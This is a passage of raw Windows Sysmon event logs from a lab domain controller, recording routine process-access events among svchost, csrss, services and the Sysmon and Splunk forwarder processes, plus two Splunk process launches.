10341000x80000000000000003604Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:05.480{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003603Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:05.480{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003602Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:05.480{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003601Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:05.480{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003600Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:05.480{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003599Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:05.480{08A6967A-4286-6000-0A00-000000009A01}8442632C:\Windows\system32\services.exe{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\services.exe+12bee|C:\Windows\system32\services.exe+66f4|C:\Windows\system32\services.exe+5154|C:\Windows\system32\services.exe+d608|C:\Windows\system32\services.exe+4c6c|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003598Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:05.494{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" serviceC:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{08A6967A-4286-6000-0A00-000000009A01}844C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x80000000000000003597Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:05.214{08A6967A-4299-6000-4100-000000009A01}39483968C:\Windows\system32\conhost.exe{08A6967A-4325-6000-B800-000000009A01}980C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003596Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:05.214{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003595Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:05.214{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003594Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:05.214{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003593Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:05.214{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003592Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:05.214{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003591Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:05.214{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003590Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:05.214{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003589Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:05.214{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-4325-6000-B800-000000009A01}980C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003588Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:05.214{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003587Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:05.214{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003586Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:05.214{08A6967A-4325-6000-B700-000000009A01}4380608C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{08A6967A-4325-6000-B800-000000009A01}980C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003585Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:05.218{08A6967A-4325-6000-B800-000000009A01}980C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool server list httpServerListener: --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{08A6967A-4325-6000-B700-000000009A01}4380C:\Program Files\SplunkUniversalForwarder\bin\btool.exebtool server list httpServerListener: --no-log 10341000x80000000000000003584Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:05.214{08A6967A-4299-6000-4100-000000009A01}39483968C:\Windows\system32\conhost.exe{08A6967A-4325-6000-B700-000000009A01}4380C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003583Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:05.198{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003582Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:05.198{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003581Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:05.198{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003580Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:05.198{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003579Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:05.198{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003578Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:05.198{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003577Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 